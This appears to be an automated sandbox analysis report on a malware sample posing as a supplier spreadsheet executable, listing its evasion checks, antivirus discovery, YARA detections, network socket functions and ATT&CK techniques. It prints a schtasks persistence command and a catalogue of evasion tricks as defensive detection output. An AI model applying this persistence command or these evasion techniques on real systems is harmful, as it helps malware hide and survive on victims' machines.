                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeWindow / User API: threadDelayed 5268Jump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeWindow / User API: foregroundWindowGot 1562Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeAPI coverage: 6.5 %
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeAPI coverage: 3.8 %
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe TID: 7388Thread sleep time: -52680s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7996Thread sleep count: 49 > 30Jump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7996Thread sleep time: -2940000s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8196Thread sleep time: -60000s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeThread sleep count: Count: 5268 delay: -10Jump to behavior
                                Source: Yara matchFile source: 00000007.00000002.2484943427.0000000002F58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.2498031591.0000000004DCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.2488281315.0000000003376000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.2484943427.0000000002F77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: ._cache_Supplier 0202AW-PER2 Sheet.exe PID: 7384, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7548, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ZMNYQK.vbs, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D8DD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00D8DD92
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DC2044
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DC219F
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00DC24A9
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00DB6B3F
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00DB6E4A
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00DBF350
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00DBFDD2
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBFD47 FindFirstFileW,FindClose,2_2_00DBFD47
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00942044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00942044
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0094219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_0094219F
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009424A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_009424A9
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00936B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_00936B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00936E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_00936E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0093F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_0093F350
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0090DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_0090DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0093FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_0093FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0093FD47 FindFirstFileW,FindClose,9_2_0093FD47
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D8E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00D8E47B
                                Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                                Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                                Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                Source: Amcache.hve.25.drBinary or memory string: VMware
                                Source: Amcache.hve.25.drBinary or memory string: VMware Virtual USB Mouse
                                Source: Amcache.hve.25.drBinary or memory string: vmci.syshbin
                                Source: Amcache.hve.25.drBinary or memory string: VMware, Inc.
                                Source: Amcache.hve.25.drBinary or memory string: VMware20,1hbin@
                                Source: Amcache.hve.25.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                                Source: Amcache.hve.25.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: Amcache.hve.25.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                                Source: ._cache_Supplier 0202AW-PER2 Sheet.exe, 00000002.00000002.2490118763.0000000001803000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: Amcache.hve.25.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                Source: Amcache.hve.25.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                                Source: Amcache.hve.25.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                                Source: Amcache.hve.25.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: ._cache_Supplier 0202AW-PER2 Sheet.exe, 00000002.00000002.2490118763.0000000001803000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: Amcache.hve.25.drBinary or memory string: vmci.sys
                                Source: Amcache.hve.25.drBinary or memory string: vmci.syshbin`
                                Source: Amcache.hve.25.drBinary or memory string: \driver\vmci,\driver\pci
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                                Source: Amcache.hve.25.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                Source: Amcache.hve.25.drBinary or memory string: VMware20,1
                                Source: Amcache.hve.25.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                Source: Amcache.hve.25.drBinary or memory string: NECVMWar VMware SATA CD00
                                Source: Amcache.hve.25.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                Source: Amcache.hve.25.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                                Source: Amcache.hve.25.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                Source: Amcache.hve.25.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                                Source: Amcache.hve.25.drBinary or memory string: VMware PCI VMCI Bus Device
                                Source: Amcache.hve.25.drBinary or memory string: VMware VMCI Bus Device
                                Source: Amcache.hve.25.drBinary or memory string: VMware Virtual RAM
                                Source: Amcache.hve.25.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                Source: Amcache.hve.25.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                                Source: Amcache.hve.25.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeAPI call chain: ExitProcess graph end nodegraph_2-107682
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeAPI call chain: ExitProcess graph end nodegraph_2-104873
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC703C BlockInput,2_2_00DC703C
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D7374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_00D7374E
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DA46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,2_2_00DA46D0
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00ED20B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00ED20B0
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D9A937 GetProcessHeap,2_2_00D9A937
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D98E19 SetUnhandledExceptionFilter,2_2_00D98E19
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D98E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D98E3C
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00918E19 SetUnhandledExceptionFilter,9_2_00918E19
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00918E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00918E3C
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DABE95 LogonUserW,2_2_00DABE95
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D7374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_00D7374E
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB4B52 SendInput,keybd_event,2_2_00DB4B52
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB7DD5 mouse_event,2_2_00DB7DD5
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeProcess created: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DAB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_00DAB398
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DABE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_00DABE31
                                Source: ._cache_Supplier 0202AW-PER2 Sheet.exe, DELPQB.exeBinary or memory string: Shell_TrayWnd
                                Source: ._cache_Supplier 0202AW-PER2 Sheet.exe, 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp, DELPQB.exe, 00000009.00000002.1337680948.000000000099E000.00000040.00000001.01000000.00000009.sdmp, DELPQB.exe, 00000015.00000002.1418887961.000000000099E000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D97254 cpuid 2_2_00D97254
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D940DA GetSystemTimeAsFileTime,__aulldiv,2_2_00D940DA
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DEC146 GetUserNameW,2_2_00DEC146
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DA2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00DA2C3C
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D8E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00D8E47B
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: Amcache.hve.25.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                                Source: Amcache.hve.25.drBinary or memory string: msmpeng.exe
                                Source: Amcache.hve.25.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                                Source: Amcache.hve.25.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                                Source: ._cache_Supplier 0202AW-PER2 Sheet.exe, 00000002.00000002.2490118763.0000000001803000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: Amcache.hve.25.drBinary or memory string: MsMpEng.exe
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: Process Memory Space: ._cache_Supplier 0202AW-PER2 Sheet.exe PID: 7384, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: Supplier 0202AW-PER2 Sheet.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Supplier 0202AW-PER2 Sheet.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.1301308336.000000000069F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Supplier 0202AW-PER2 Sheet.exe PID: 7292, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7412, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXC902.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: ._cache_Supplier 0202AW-PER2 Sheet.exe, 00000002.00000002.2498031591.0000000004D95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81!
                                Source: DELPQB.exe, 0000001E.00000002.2350709555.000000000099E000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                                Source: DELPQB.exe, 0000001B.00000003.1742892347.00000000041A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                                Source: DELPQB.exeBinary or memory string: WIN_XP
                                Source: DELPQB.exeBinary or memory string: WIN_XPe
                                Source: DELPQB.exeBinary or memory string: WIN_VISTA
                                Source: DELPQB.exe, 00000009.00000003.1304607933.0000000004252000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81.`
                                Source: DELPQB.exeBinary or memory string: WIN_7
                                Source: DELPQB.exe, 0000001E.00000003.2338399403.0000000004840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81{
                                Source: DELPQB.exeBinary or memory string: WIN_8
                                Source: Yara matchFile source: Process Memory Space: ._cache_Supplier 0202AW-PER2 Sheet.exe PID: 7384, type: MEMORYSTR

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: Process Memory Space: ._cache_Supplier 0202AW-PER2 Sheet.exe PID: 7384, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: Supplier 0202AW-PER2 Sheet.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Supplier 0202AW-PER2 Sheet.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.1301308336.000000000069F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Supplier 0202AW-PER2 Sheet.exe PID: 7292, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7412, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXC902.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00DC91DC
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00DC96E2
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009491DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,9_2_009491DC
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009496E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,9_2_009496E2
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information421
                                Scripting
                                2
                                Valid Accounts
                                11
                                Windows Management Instrumentation
                                421
                                Scripting
                                1
                                Exploitation for Privilege Escalation
                                1
                                Disable or Modify Tools
                                11
                                Input Capture
                                2
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                4
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomains1
                                Replication Through Removable Media
                                3
                                Native API
                                1
                                DLL Side-Loading
                                1
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                LSASS Memory1
                                Peripheral Device Discovery
                                Remote Desktop Protocol11
                                Input Capture
                                11
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Scheduled Task/Job
                                2
                                Valid Accounts
                                1
                                Extra Window Memory Injection
                                21
                                Obfuscated Files or Information
                                Security Account Manager1
                                Account Discovery
                                SMB/Windows Admin Shares3
                                Clipboard Data
                                3
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCron1
                                Scheduled Task/Job
                                2
                                Valid Accounts
                                1
                                Software Packing
                                NTDS4
                                File and Directory Discovery
                                Distributed Component Object ModelInput Capture34
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd21
                                Registry Run Keys / Startup Folder
                                21
                                Access Token Manipulation
                                1
                                DLL Side-Loading
                                LSA Secrets38
                                System Information Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                                Process Injection
                                1
                                Extra Window Memory Injection
                                Cached Domain Credentials1
                                Query Registry
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                Scheduled Task/Job
                                12
                                Masquerading
                                DCSync251
                                Security Software Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job21
                                Registry Run Keys / Startup Folder
                                2
                                Valid Accounts
                                Proc Filesystem121
                                Virtualization/Sandbox Evasion
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
